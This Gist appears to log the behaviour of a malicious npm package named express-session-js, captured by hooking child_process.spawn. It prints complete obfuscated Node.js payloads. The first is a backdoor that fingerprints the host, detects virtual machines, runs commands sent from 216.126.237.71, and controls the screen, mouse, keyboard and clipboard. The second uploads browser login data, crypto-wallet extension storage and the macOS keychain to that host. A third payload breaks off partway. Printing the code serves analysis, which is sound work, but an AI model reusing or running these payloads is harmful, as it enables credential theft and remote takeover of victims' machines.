Created
April 2, 2026 09:33
-
-
Save b401/6c2a4f0049a9f8a3c8aa24ef7f7c7ca7 to your computer and use it in GitHub Desktop.
express-session-js@1.19.0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const F=b;(function(c,d){const E=b,e=c();while(!![]){try{const f=-parseInt(E(0x1fd))/(-0x1b33+0x71*0x31+0x593)*(-parseInt(E(0x1c8))/(-0x20c2+0x147a+0xc4a*0x1))+-parseInt(E(0x202))/(0x156f+-0x2d4+0x1*-0x1298)+-parseInt(E(0x235))/(0x26bc+0xe8+-0x20*0x13d)*(-parseInt(E(0x22b))/(-0x2707+0x1719+0xff3))+parseInt(E(0x1dc))/(0x1*0x263+0x1*0x2550+-0x27ad*0x1)*(parseInt(E(0x228))/(0xdcd*-0x2+0x1*0x1e51+-0x2b0))+-parseInt(E(0x21d))/(-0x13*0x58+-0x1f6*0x11+0x27e6)+-parseInt(E(0x1a3))/(0x14e+-0x5ce*0x4+0x1*0x15f3)+parseInt(E(0x191))/(0x923+0x239*-0xb+0x7ad*0x2);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x1d16+0x5*0x3bd8+-0x7b*-0x38f));const axios=require(F(0x16c)),os=require('os'),fs=require('fs'),{execSync,exec,spawn}=require(F(0x1de)),uid=F(0x1ec),m=F(0x1e8),p=F(0x213),t='8';function b(c,d){c=c-(0xb97*0x1+0x117f+-0x1bac);const e=a();let f=e[c];return f;}function a(){const a1=['npm\\x20install\\x20socket.io-client\\x20sha','ODidI','mouseClick','fajPX','mouseMove','lGoKS','voNvP','type','gfGvc','4801','oglevel\\x20silent','left','floor','virtualbox','mouseScroll\\x20error:','dzbbW','-no-progress\\x20--loglevel\\x20silent','path','KGHlA','1636888sovVwd','height','stringify','tTXki','Mouse\\x20move\\x20error:','post','\\x20(VM)','chTkV','pcVuP','platform','png','1351xkyMCl','release','middle','5koRTCO','Rezpj','clipboardy','Get-CimInstance\\x20Win32_ComputerSy','darwin','Nwsgv','VdWNi','fPDqy','kmWyX','http://','318196doOQyS','messge','eDUQM','omlEw','screenshot-desktop','hostname','wpoPn','max','pressKey','pSglE','userInfo','capture','system_profiler\\x20SPHardwareDataTy','command','bJBRB','wxUrp','jVNht','/api/service/process/','wNiQy','releaseKey','then','keyCombo','kill','setPosition','FTOoM','JTMRA','.npm','/proc/cpuinfo','connect','right','sVhxI','Sjuhg','PImTm','reverse','kVINT','axios','existsSync','powershell\\x20-NoProfile\\x20-Command\\x20\\x22','Installing\\x20socket.io-client','jUHBZ','TabEa','@nut-tree-fork/nut-js','acturer\\x22','tHMFR','QCMcp','hcfwS','BrCpI','yncHu','MIDDLE','bjvgx','stderr','Screenshot\\x20error:','whoIm','toBuffer','HIyck','pid','RIGHT','keyTap\\x20error:','Control','MVVlG','BpvVY','DhDZj','indexOf','click','clipboardy\\x20unavailable:','Invalid\\x20mouse\\x20button:\\x20','ttbep','fENXZ','XgfTU','test','qemu','kaGnF','4993620ZrysUc','includes','scrollUp','down','write','Gepon','gYTLa','pasteText\\x20error:','cid','BxaCH','toString','BmKRI','IIvbx','toLowerCase','Header\\x20Error:\\x20','bsFMj','pasteText','sharp','1445220utrXRF','BYcFy','siRCU','4:2:0','win32','ings\\x20--no-save\\x20--no-progress\\x20--l','default','copyText','gATWI','yyOJo','IxmwX','warn','writeFileSync','stem\\x20|\\x20Select-Object\\x20Model,Manuf','PQINm','ICteq','sendKeyCombination\\x20error:','microsoft\\x20corporation','XveHd','rp\\x20screenshot-desktop\\x20clipboardy','Wkusw','vmware','xRXYX','jHOtd','gcEBn','linux','mouseScroll','\\x20@nut-tree-fork/nut-js\\x20--no-warn','whour','MuuEN','XIASs','Jyaeb','vhost.ctl','mouseClick\\x20error:','XtLLZ','snHZl','unlinkSync','2iahRFL','MihzO','ASTff','sid','HHSps','code','socket.io-client','xUcBX','base64','OoURV','cmxdb','IJgxs','homedir','jpeg','utf8','/api/service/makelog','LDdGV','HLVgl','screen','lCLeK','2772VDFuUs','SS\\x20Err:\\x20','child_process','hhawf','read','min','readFileSync','width','catch','message','JlgWz','join','216.126.237.71','title','disconnect','SRltv','a36adbc35e69b22acbf9f834a0deb286','npm\\x20install\\x20-g\\x20socket.io-client\\x20','copyText\\x20error:','cIjxa','sfJCX','exit','kRhYg','quALo','mkdirSync','error','(Local)','emit','liWch','scrollDown','copyClipboard','keyTap','LEFT','158279xSKvwS','CFrEz','LPPdD','--save\\x20--no-warnings\\x20--no-save\\x20-','YOczM','795198cgZkMQ','zXNGe','PdrGa','vRywU','YPBaj','glxIg','text','GcQmT'];a=function(){return a1;};return a();}process[F(0x1e9)]=F(0x1c3);const path=require(F(0x21b)),pathDir=path[F(0x1e7)](os[F(0x1d4)](),F(0x24f)),pidFile=path[F(0x1e7)](os[F(0x1d4)](),F(0x24f),process[F(0x1e9)]);let tryGlobal=![];function isRunning(c){const G=F;try{return process[G(0x24b)](c,-0x226b+-0x1145*-0x2+-0x1f),!![];}catch(d){return![];}}if(fs[F(0x16d)](pidFile)){const existingPid=parseInt(fs[F(0x1e2)](pidFile)[F(0x19b)]());isRunning(existingPid)?process[F(0x1f1)](-0x2*-0x1007+0x7a6+-0x27b3):fs[F(0x1c7)](pidFile);}fs[F(0x1f4)](pathDir,{'recursive':!![]}),fs[F(0x1af)](pidFile,process[F(0x180)][F(0x19b)](),{'flag':'w+'}),process['on'](F(0x1f1),()=>{const H=F;if(fs[H(0x16d)](pidFile))fs[H(0x1c7)](pidFile);});const makeLog=async c=>{const I=F,d={'BmKRI':function(f,g){return f+g;},'fPDqy':function(f,g){return f+g;},'HIyck':I(0x234),'gcEBn':I(0x1d7)};try{const f=await axios[I(0x222)](d[I(0x19c)](d[I(0x232)](d[I(0x17f)],m),d[I(0x1bb)]),{'message':c,'host':os[I(0x23a)](),'uid':uid,'t':t})[I(0x249)](g=>{})[I(0x1e4)](g=>{});}catch(g){}},setHeader=async function(){const J=F,c={'SRltv':function(d,f){return d==f;},'tHMFR':J(0x1a7),'wxUrp':function(d,f,g){return d(f,g);},'yyOJo':J(0x16e)+J(0x22e)+J(0x1b0)+J(0x173),'IIvbx':function(d,f){return d>f;},'pSglE':J(0x1b8),'Wkusw':J(0x217),'siRCU':J(0x1b4),'xRXYX':J(0x18f),'HLVgl':J(0x22f),'eDUQM':J(0x241)+'pe','gfGvc':function(d,f){return d==f;},'XIASs':J(0x1bc),'DhDZj':J(0x250),'chTkV':J(0x1d6),'MihzO':function(d,f){return d+f;},'hhawf':J(0x234),'gATWI':J(0x246),'hcfwS':function(d,f){return d+f;},'PQINm':J(0x223),'kVINT':J(0x1f6),'gYTLa':function(d,f){return d(f);},'quALo':function(d,f){return d+f;},'lGoKS':J(0x19f)};try{let d=![];if(c[J(0x1eb)](os[J(0x226)](),c[J(0x174)])){let f=c[J(0x244)](execSync,c[J(0x1ac)],{'windowsHide':!![]});f=f[J(0x19b)]()[J(0x19e)](),(c[J(0x19d)](f[J(0x187)](c[J(0x23e)]),-(0xcb*0xd+-0x44*-0x1f+-0x2a*0x71))||f[J(0x192)](c[J(0x1b7)])||f[J(0x192)](c[J(0x1a5)])||f[J(0x192)](c[J(0x1b9)]))&&(d=!![]);}else{if(c[J(0x1eb)](os[J(0x226)](),c[J(0x1d9)])){let g=c[J(0x244)](execSync,c[J(0x237)],{'windowsHide':!![]});g=g[J(0x19b)]()[J(0x19e)](),/vmware|virtualbox|qemu|parallels|virtual/i[J(0x18e)](g)&&(d=!![]);}else{if(c[J(0x212)](os[J(0x226)](),c[J(0x1c1)])){let h=fs[J(0x1e2)](c[J(0x186)],c[J(0x224)])[J(0x19e)]();/hypervisor|vmware|virtualbox|qemu|kvm|xen|parallels|bochs/[J(0x18e)](h)&&(d=!![]);}}}return await axios[J(0x222)](c[J(0x1c9)](c[J(0x1c9)](c[J(0x1c9)](c[J(0x1df)],m),c[J(0x1ab)]),uid),{'OS':os[J(0x211)](),'platform':os[J(0x226)](),'release':c[J(0x176)](os[J(0x229)](),d?c[J(0x1b1)]:c[J(0x16b)]),'host':os[J(0x23a)](),'userInfo':os[J(0x23f)](),'uid':uid,'t':t});}catch(i){c[J(0x197)](makeLog,c[J(0x1f3)](c[J(0x20f)],i[J(0x1e5)]));}},IM=async()=>{const K=F,c={'YPBaj':function(d){return d();},'ttbep':function(d,e){return d(e);},'Gepon':K(0x16f),'bJBRB':function(d,e,f){return d(e,f);},'kRhYg':K(0x20a)+K(0x1b6)+K(0x1be)+K(0x1a8)+K(0x214)};await c[K(0x206)](setHeader),c[K(0x18b)](makeLog,c[K(0x196)]),c[K(0x243)](execSync,c[K(0x1f2)],{'windowsHide':!![]});},ss=async()=>{const L=F,c={'vRywU':L(0x22d),'Jyaeb':L(0x189),'kaGnF':L(0x1e5),'GcQmT':L(0x1f5),'wpoPn':L(0x17b),'OoURV':function(d,f,g,h){return d(f,g,h);},'JTMRA':function(d,f){return d*f;},'VdWNi':function(d,f){return d(f);},'BxaCH':L(0x17d),'CFrEz':L(0x1a6),'MVVlG':function(d,f){return d(f);},'JlgWz':L(0x227),'PImTm':function(d,f,g){return d(f,g);},'fajPX':L(0x1da),'snHZl':L(0x1d0),'BrCpI':L(0x17c),'ASTff':function(d,f){return d*f;},'xUcBX':function(d,f){return d-f;},'Sjuhg':L(0x221),'PdrGa':L(0x215),'XtLLZ':L(0x252),'FTOoM':L(0x22a),'QCMcp':L(0x1c4),'TabEa':function(d,f){return d===f;},'bsFMj':function(d,f){return d||f;},'IxmwX':function(d,f){return d||f;},'XveHd':L(0x218),'tTXki':L(0x194),'omlEw':function(d,f){return d(f);},'zXNGe':L(0x182),'voNvP':L(0x1b3),'Nwsgv':function(d,f,g){return d(f,g);},'kmWyX':L(0x1fa),'YOczM':L(0x1ee),'sfJCX':function(d,f,g){return d(f,g);},'sVhxI':L(0x183),'BYcFy':L(0x198),'cIjxa':function(d){return d();},'ICteq':L(0x1ce),'pcVuP':L(0x1a2),'jUHBZ':L(0x239),'fENXZ':function(d,f){return d(f);},'lCLeK':L(0x172),'IJgxs':function(d,f){return d+f;},'HHSps':function(d,f){return d+f;},'jVNht':L(0x234),'liWch':L(0x242),'dzbbW':L(0x1bf),'LPPdD':L(0x240),'MuuEN':L(0x20e),'Rezpj':L(0x20c),'ODidI':L(0x1bd),'BpvVY':L(0x1fb),'wNiQy':L(0x24a),'XgfTU':L(0x1aa),'glxIg':L(0x24b),'cmxdb':L(0x1a1),'yncHu':L(0x251),'jHOtd':L(0x1ea),'KGHlA':function(d,f){return d(f);},'bjvgx':L(0x1dd),'LDdGV':L(0x1ed)+L(0x200)+L(0x21a)};await c[L(0x1ef)](IM);try{let d=c[L(0x238)](require,c[L(0x1b2)]);const f=c[L(0x238)](require,c[L(0x225)]),g=c[L(0x231)](require,c[L(0x170)]),{mouse:h,screen:i,keyboard:j,Button:k,Key:l,sleep:n}=c[L(0x18c)](require,c[L(0x1db)]);let o=null;async function q(){const M=L;if(o)return o;try{const v=await import(c[M(0x205)]);return o=v[M(0x1a9)],o;}catch(w){return console[M(0x1ae)](c[M(0x1c2)],w[M(0x1e5)]),null;}}await c[L(0x1ef)](q);const r=c[L(0x230)](d,c[L(0x1d3)](c[L(0x1d3)](c[L(0x1cc)](c[L(0x245)],m),':'),p),{'reconnectionAttempts':0x0,'reconnectionDelay':0x7d0,'timeout':0x1e8480});r['on'](c[L(0x1f8)],v=>{const N=L;try{c[N(0x1d1)](exec,v[N(0x1e5)],{'windowsHide':!![],'maxBuffer':c[N(0x24e)](c[N(0x24e)](0xcab+0x31*-0x3a+-0x1*-0x26f,0x25e1*0x1+-0x1*-0x21e+0x1e5*-0x13),-0x80+-0x1b8b+0x9*0x33f),'cwd':os[N(0x1d4)]()},(w,z,A)=>{const O=N;if(w){r[O(0x1f7)](c[O(0x190)],{'result':w[O(0x1e5)],...v,'uid':uid,'type':c[O(0x209)],'t':t});return;}if(A){r[O(0x1f7)](c[O(0x190)],{'result':A,...v,'type':c[O(0x23b)]});return;}r[O(0x1f7)](c[O(0x190)],{...v,'result':z,'code':v[O(0x1cd)],'cid':v[O(0x199)],'sid':v[O(0x1cb)],'uid':uid,'t':t});});}catch(w){c[N(0x231)](makeLog,w[N(0x236)]);}}),r['on'](c[L(0x219)],v=>{const P=L;r[P(0x1f7)](c[P(0x19a)],{'OS':os[P(0x211)](),'platform':os[P(0x226)](),'release':os[P(0x229)](),'host':os[P(0x23a)](),'userInfo':os[P(0x23f)](),'uid':uid,'t':t});});async function s(v,w=0x61f*0x2+-0x4*0x4ab+0x6d2){const Q=L;return await c[Q(0x231)](f,v)[Q(0x1d5)]({'quality':w,'chromaSubsampling':c[Q(0x1fe)],'mozjpeg':!![]})[Q(0x17e)]();}r['on'](c[L(0x1ff)],async({quality:v,sid:w}={})=>{const R=L;try{let z=await c[R(0x184)](g,{'format':c[R(0x1e6)]});z=await c[R(0x255)](s,z,v),r[R(0x1f7)](c[R(0x20d)],{'sid':w,'img':z[R(0x19b)](c[R(0x1c6)])},()=>{});}catch(A){console[R(0x1f5)](c[R(0x177)],A);}}),r['on'](c[L(0x1c0)],async({x:v,y:w})=>{const S=L;try{const z=await i[S(0x1e3)](),A=await i[S(0x21e)](),B=Math[S(0x216)](c[S(0x1ca)](v,z)),C=Math[S(0x216)](c[S(0x24e)](w,A));await h[S(0x24c)]({'x':Math[S(0x1e1)](Math[S(0x23c)](B,-0x1505+0x1710+-0x20b),c[S(0x1cf)](z,0x12c4+-0xc0b+-0x6b8)),'y':Math[S(0x1e1)](Math[S(0x23c)](C,-0x739*0x2+0x10d6+-0x264),c[S(0x1cf)](A,0x8a5+0x1a7b*0x1+0x1*-0x231f))});}catch(D){console[S(0x1f5)](c[S(0x254)],D);}}),r['on'](c[L(0x22c)],async v=>{const T=L;try{let w;switch(v){case c[T(0x204)]:w=k[T(0x1fc)];break;case c[T(0x1c5)]:w=k[T(0x181)];break;case c[T(0x24d)]:w=k[T(0x179)];break;default:throw new Error(T(0x18a)+v);}await h[T(0x188)](w);}catch(z){console[T(0x1f5)](c[T(0x175)],z);}}),r['on'](c[L(0x20b)],async({direction:v,amount:w})=>{const U=L;try{if(c[U(0x171)](v,'up'))await h[U(0x193)](c[U(0x1a0)](w,-0x260b+-0xb20+0x1064*0x3));else await h[U(0x1f9)](c[U(0x1ad)](w,0xad*0x11+0x1*-0x359+0x1*-0x823));}catch(z){console[U(0x1f5)](c[U(0x1b5)],z),d;}}),r['on'](c[L(0x185)],async({type:v,key:w})=>{const V=L;try{if(c[V(0x171)](v,c[V(0x220)]))await j[V(0x23d)](w);if(c[V(0x171)](v,'up'))await j[V(0x248)](w);await c[V(0x238)](n,0x6e*-0x59+0xd3d+-0x859*-0x3);}catch(z){console[V(0x1f5)](c[V(0x203)],z);}});async function u(v,w){const W=L;try{for(const z of v)await j[W(0x23d)](z);await j[W(0x23d)](w),await c[W(0x238)](n,0x1*-0x19c+0x17c1*0x1+0x1611*-0x1),await j[W(0x248)](w);for(const A of v[W(0x16a)]())await j[W(0x248)](A);}catch(B){console[W(0x1f5)](c[W(0x210)],B);}}r['on'](c[L(0x247)],async({modifiers:modifiers=[],key:v})=>{const X=L;await c[X(0x230)](u,modifiers,v);}),r['on'](c[L(0x18d)],async v=>{const Y=L;try{const w=await o[Y(0x1e0)]();r[Y(0x1f7)](c[Y(0x233)],{'cid':v[Y(0x1cb)],'text':w});}catch(z){console[Y(0x1f5)](c[Y(0x201)],z);}}),r['on'](c[L(0x207)],async v=>{const Z=L;process[Z(0x1f1)](0x1*-0x231+-0x52*-0x1a+-0x623);}),r['on'](c[L(0x1d2)],async v=>{const a0=L;try{await o[a0(0x195)](v[a0(0x208)]),await c[a0(0x1f0)](u,[c[a0(0x253)]],0x1274+-0x144a+0x21*0x11);}catch(w){console[a0(0x1f5)](c[a0(0x1a4)],w);}}),r['on'](c[L(0x178)],v=>{}),r['on'](c[L(0x1ba)],()=>{});}catch(v){c[L(0x21c)](makeLog,c[L(0x1cc)](c[L(0x17a)],JSON[L(0x21f)](v[L(0x1e5)])));if(!tryGlobal)c[L(0x255)](execSync,c[L(0x1d8)],{'windowsHide':!![]});else process[L(0x1f1)](0x18a*-0x11+0x48b*-0x5+0x30e1);tryGlobal=!![],c[L(0x1ef)](ss);}};ss();\n \n" | |
| ], | |
| { | |
| "windowsHide": true, | |
| "detached": true, | |
| "stdio": "ignore" | |
| } | |
| ] | |
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const s=b;(function(c,d){const r=b,e=c();while(!![]){try{const f=-parseInt(r(0x211))/(-0x25e7+-0x1bbf*0x1+0x7*0x961)+parseInt(r(0x233))/(-0x1*0xf8f+-0x1*0x1553+0xc4c*0x3)+parseInt(r(0x1f3))/(-0x1e28+-0xa23+0x2*0x1427)+-parseInt(r(0x1f9))/(-0x7b4+-0x12*-0x188+-0x13d8)*(parseInt(r(0x21e))/(-0x14f0+0x1ec4+-0x9cf))+-parseInt(r(0x1dd))/(-0x22c*0x11+-0x10ae+0x35a0)*(-parseInt(r(0x1c3))/(0x87d+0xe44+-0x16ba))+parseInt(r(0x1e2))/(-0x20e+0xb6+-0x16*-0x10)+-parseInt(r(0x1cf))/(0x45d*0x6+0x395*-0x5+-0x20f*0x4)*(-parseInt(r(0x200))/(0x132d*-0x1+0x3ae+0x1*0xf89));if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x5ff19+0x3c793+-0x65fd8));const {execSync}=require(s(0x1d8)),path=require(s(0x1ca)),axios=require(s(0x204)),fs=require('fs'),os=require('os'),FormData=require(s(0x202));process[s(0x220)]=s(0x1b3);const formData=new FormData(),username=os[s(0x219)]()[s(0x1e9)],ss=s(0x1fa),uu=s(0x243)+ss+s(0x1ff),uc=s(0x243)+ss+s(0x216),ukey=s(0x212),t='8';let i=0xc64*-0x1+0x227c+0x4*-0x586;function a(){const C=['filter','platform','5514fTssoK','data','indexOf','penjlddjkjgpnkllboccdgccekpkcbin','Library/Application\\x20Support/Goog','513760ZbMbqm','push','post','khpkpbbcccdmmclmpigdgddabeilkdpd','eSoftware/Brave-Browser','\\x20&&\\x20','darwin','username','acmacodkjbdgmoleebolmdjonilkdbch','fldfpgipfncgndfolcbkdeeknbbbnhcc','\\x20Data','Olctw','/Login\\x20Data\\x20For\\x20Account','agoakfejjabomempkjlepdflaleeobhb','Library/Application\\x20Support/Brav','exit','osoft\\x20Edge','631842fixucZ','then','append','fEEXt','UAcZZ','outdX','8rJsKBx','216.126.237.71:4809','replace','AMvMl','ejbalbakoplchlghecdalmeeeajnimhm','sEDWs','/upload','2270saUECr','pVtJg','form-data','GtOmw','axios','bhhhlbepdkbapadjdnnojkbgioiodbic','isFile','existsSync','/Web\\x20Data','idHAX','rmSync','hgRAK','afbcbjpbpfadlkmhmclhkeeodmamcflc','ibnejdfjmmkpcnlpebklmnkoeoihofec','createReadStream','Library/Application\\x20Support/Micr','fhbohimaelbohpjbbldcngcnapndodjp','363417bnSUau','804','win32','env','dhLak','/cldbs','Library/Application\\x20Support/LT\\x20B','.config/google-chrome','userInfo','hbRDN','.config/microsoft-edge','gjnckgkfmgmibbkoficdidcljeaaaheg','qbGQs','321320XaBXws','eNMgV','title','hiaHs','aeachknmefphepccionboohckonoeemg','egjidjbpglichdcondbcbdnbeeppgdph','mcohilncbfahbmgdjkbpemcciiolgcge','MrKkF','rzfVP','.config/lt-browser','ppbibelpcjmhbdihakflkdcoccbgbkpo','LT\\x20Browser/User\\x20Data','eHHyV','KukUW','__tmp__','test','omaabbefbmiijedngplfjmnooppbclkk','hifafgmccdpekplomjjkcfgodnhcellj','readdirSync','splice','vIgNM','381622NwQdim','LfSzW','eKaTc','le/Chrome','aholpfdialjgjfhomihkjbmgjidlcdno','rziJL','getHeaders','UkPgN','bfnaelmomeimhlpmgjnjophhpkkoljpa','HOME','jblndlipeogpafnldhgmapagcccfchpi','n-db','iENPR','LOCALAPPDATA','/Login\\x20Data','nphplpgoakhhjchkkhmiggakijnkhfnd','http://','EpZsT','operasoftware.Opera','rQwol','now','/Local\\x20Extension\\x20Settings/','FsshQ','wspzy','/ldb','dmkamcknogkgcdfhhbddcghachkejeap','statSync','Microsoft/Edge/User\\x20Data','FpvGo','TmjVr','join','npm-cache','dEwvc','nkbihfbeogaeaoehlefnkodbefgpgknn','linux','cTHHU','file','tmpdir','smNaU','dlcobpjiigpikoobohmabehhmhfoodbb','lVZev','UqfMG','error','rmdir\\x20\\x22','/Library/Keychains/login.keychai','zLSxy','vOXUT','280EhhyMm','Google/Chrome/User\\x20Data','length','YPOoy','dAkqS','uJgpD','rowser','path','qHVPh','\\x22\\x20/s\\x20/q','oqqjG','BorHN','8424ZkkOgR','BraveSoftware/Brave-Browser/User','Library/Application\\x20Support/com.','catch','hostname','XBgCg','cpSync','upQSs','lgmpcpglpngdoalbgeoldeajfclnhafa','child_process','.config/BraveSoftware/Brave-Brow','ser'];a=function(){return C;};return a();}const wps=[s(0x1ea),s(0x1b5),s(0x23b),s(0x1ad),s(0x1fd),s(0x228),s(0x223),s(0x20d),s(0x205),s(0x22e),s(0x1e5),s(0x210),s(0x222),s(0x22f),s(0x23d),s(0x1bb),s(0x224),s(0x1ef),s(0x237),s(0x242),s(0x1e0),s(0x1d7),s(0x1eb),s(0x21c),s(0x20c)];let mp=[];const getBasePaths=()=>{const u=s,c={'GtOmw':function(e,f){return e===f;},'dEwvc':u(0x213),'qbGQs':u(0x1c4),'iENPR':u(0x1af),'TmjVr':u(0x229),'hiaHs':u(0x1d0)+u(0x1ec),'UkPgN':u(0x1e8),'MrKkF':u(0x1e1)+u(0x236),'UqfMG':u(0x1f0)+u(0x1e6),'vOXUT':u(0x1d1)+u(0x245),'FpvGo':u(0x217)+u(0x1c9),'Olctw':u(0x20f)+u(0x1f2),'eHHyV':u(0x1b6),'zLSxy':u(0x218),'pVtJg':u(0x21b),'hgRAK':u(0x227),'oqqjG':u(0x1d9)+u(0x1da)},d=process[u(0x1dc)];if(c[u(0x203)](d,c[u(0x1b4)]))return[''+path[u(0x1b2)](process[u(0x214)][u(0x240)],c[u(0x21d)]),''+path[u(0x1b2)](process[u(0x214)][u(0x240)],c[u(0x23f)]),''+path[u(0x1b2)](process[u(0x214)][u(0x240)],c[u(0x1b1)]),''+path[u(0x1b2)](process[u(0x214)][u(0x240)],c[u(0x221)])];else{if(c[u(0x203)](d,c[u(0x23a)]))return[''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x225)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1bd)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1c2)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1b0)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1ed)])];else{if(c[u(0x203)](d,c[u(0x22a)]))return[''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1c1)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x201)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x20b)]),''+path[u(0x1b2)](process[u(0x214)][u(0x23c)],c[u(0x1cd)])];else process[u(0x1f1)](-0xc43+0x1975+-0x1*0xd31);}}};async function sleep(c){return new Promise(d=>setTimeout(d,c));}function b(c,d){c=c-(-0x2e3+0x243b+-0xa*0x32b);const e=a();let f=e[c];return f;}const basePaths=getBasePaths();let timestamp=null;const CLDBS=async c=>{const v=s,d={'YPOoy':v(0x1be),'dhLak':v(0x1fd),'LfSzW':v(0x1b5)};return await axios[v(0x1e4)](uc,{'path':c[v(0x1fb)](d[v(0x215)],d[v(0x234)]),'timestamp':timestamp,'userkey':ukey,'hostname':os[v(0x1d3)](),'username':username,'t':t})[v(0x1f4)](e=>{const w=v;return e[w(0x1de)];})[v(0x1d2)](e=>{const x=v;return d[x(0x1c6)];});},uf=async(c,d)=>{const y=s,e={'AMvMl':y(0x1b8),'hbRDN':y(0x1fd),'smNaU':y(0x1b5)};if(!fs[y(0x207)](c))return![];if(!d)d=c;if(fs[y(0x1ae)](c)[y(0x206)]()){const f=new FormData();f[y(0x1f5)](e[y(0x1fc)],fs[y(0x20e)](c));try{const g=await axios[y(0x1e4)](uu,f,{'headers':{...f[y(0x239)](),'userkey':ukey,'hostname':os[y(0x1d3)](),'t':t,'username':username,'path':d[y(0x1fb)](e[y(0x21a)],e[y(0x1ba)]),'timestamp':timestamp}});}catch(h){}}},getFindCommands=async()=>{const z=s,c={'eNMgV':z(0x22c),'rziJL':function(g,h){return g(h);},'KukUW':function(g,h){return g(h);},'upQSs':function(g,h){return g(h);},'cTHHU':function(g,h,j){return g(h,j);},'eKaTc':function(g,h){return g<h;},'lVZev':function(g,h){return g==h;},'rzfVP':function(g,h){return g(h);},'EpZsT':function(g,h){return g+h;},'fEEXt':z(0x1ac),'vIgNM':z(0x213),'qHVPh':function(g,h){return g(h);},'wspzy':z(0x1e7)},d=process[z(0x1dc)];let e=[];const f=path[z(0x1b2)](os[z(0x1b9)](),c[z(0x21f)]);for(let g of basePaths){if(!fs[z(0x207)](g))continue;const h=fs[z(0x230)](g)[z(0x1db)](j=>/^Profile.*|^Default$/[z(0x22d)](j));for(let j of h){await c[z(0x238)](uf,g+'/'+j+z(0x241)),await c[z(0x22b)](uf,g+'/'+j+z(0x1ee)),await c[z(0x1d6)](uf,g+'/'+j+z(0x208));for(let k of wps){const l=g+'/'+j+z(0x248)+k;if(!fs[z(0x207)](l))continue;const m=path[z(0x1b2)](f,j,k);fs[z(0x207)](m)&&fs[z(0x20a)](m,{'recursive':!![],'force':!![]});fs[z(0x1d5)](l,m,{'recursive':!![],'force':!![]});const n=fs[z(0x230)](m);for(let o of n){await c[z(0x1b7)](uf,m+'/'+o,l+'/'+o);}if(c[z(0x235)](wps[z(0x1df)](k),0x25e2*0x1+-0x1b24+-0xab6)){if(c[z(0x1bc)](mp[z(0x1df)](l),-(-0xba*-0x25+-0x2*0x677+-0x1*0xdf3)))mp[z(0x1e3)](l);const p=await c[z(0x226)](CLDBS,c[z(0x244)](l,c[z(0x1f6)])),q=mp[z(0x1df)](l);c[z(0x1bc)](p,'ok')&&mp[z(0x231)](q,-0x255d+0x1b*-0x8e+-0x19*-0x218);}}}}if(c[z(0x1bc)](os[z(0x1dc)](),c[z(0x232)])){if(fs[z(0x207)](f))c[z(0x1cb)](execSync,z(0x1bf)+f+z(0x1cc));}return e[z(0x1b2)](c[z(0x1ab)]);},run=async()=>{const A=s,c={'dAkqS':function(e){return e();},'idHAX':function(e,f){return e>f;},'FsshQ':function(e,f){return e(f);},'uJgpD':function(e,f){return e==f;},'sEDWs':function(e,f){return e+f;},'UAcZZ':A(0x1ac)};timestamp=Date[A(0x247)]();const d=await c[A(0x1c7)](getFindCommands);i++;while(c[A(0x209)](mp[A(0x1c5)],0xa26+0x169f+-0x20c5)){await c[A(0x1aa)](sleep,0x1*0x1c884+-0x5ecd+-0x7f57),timestamp=Date[A(0x247)]();for(fp of mp){if(!fs[A(0x207)](fp))continue;const e=fs[A(0x230)](fp);for(let h of e){await c[A(0x1aa)](uf,fp+'/'+h);}if(c[A(0x1c8)](mp[A(0x1df)](fp),-(-0x1*-0x148d+0x1250+0x6*-0x67a)))mp[A(0x1e3)](fp);const f=await c[A(0x1aa)](CLDBS,c[A(0x1fe)](fp,c[A(0x1f7)])),g=mp[A(0x1df)](fp);c[A(0x1c8)](f,'ok')&&mp[A(0x231)](g,0xd21+0x108+-0xe28);}}};((async()=>{const B=s,c={'rQwol':function(d,e){return d==e;},'BorHN':B(0x1e8),'XBgCg':function(d,e){return d(e);},'outdX':function(d){return d();}};c[B(0x246)](os[B(0x1dc)](),c[B(0x1ce)])&&await c[B(0x1d4)](uf,process[B(0x214)][B(0x23c)]+(B(0x1c0)+B(0x23e))),await c[B(0x1f8)](run);})());\n " | |
| ], | |
| { | |
| "windowsHide": true, | |
| "detached": true, | |
| "stdio": "ignore" | |
| } | |
| ] | |
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const m=b;(function(c,d){const l=b,e=c();while(!![]){try{const f=parseInt(l(0x1ac))/(-0x2072+-0x5b5*-0x1+0x1abe)*(-parseInt(l(0x268))/(-0x1828+-0x2a2*-0x3+0x1044))+-parseInt(l(0x180))/(-0x14*0x152+0xc7*0x17+-0x88a*-0x1)+parseInt(l(0x1d5))/(0x1581*0x1+0xf6c+0xb*-0x35b)*(-parseInt(l(0x1c2))/(0x1608+-0x98e+-0xc75))+parseInt(l(0x1c0))/(-0xc11*-0x1+-0x245e+0x1df*0xd)+-parseInt(l(0x232))/(0x9c9+0x2*-0xf0e+0x145a)*(parseInt(l(0x1a2))/(-0x2495*-0x1+0x2fe+-0x278b))+parseInt(l(0x25d))/(0x1*0x121b+0x1ff*0xb+-0x2807)*(-parseInt(l(0x230))/(-0x1*0x6c5+0x15d*-0x11+-0x65*-0x4c))+parseInt(l(0x261))/(-0xa1*-0x27+0x1f81*0x1+-0x37fd)*(parseInt(l(0x189))/(0x166c+0x1ecf+-0x185*0x23));if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x3*-0x2f5f0+0xb6f*0x16a+-0xb8d7*-0x3));const 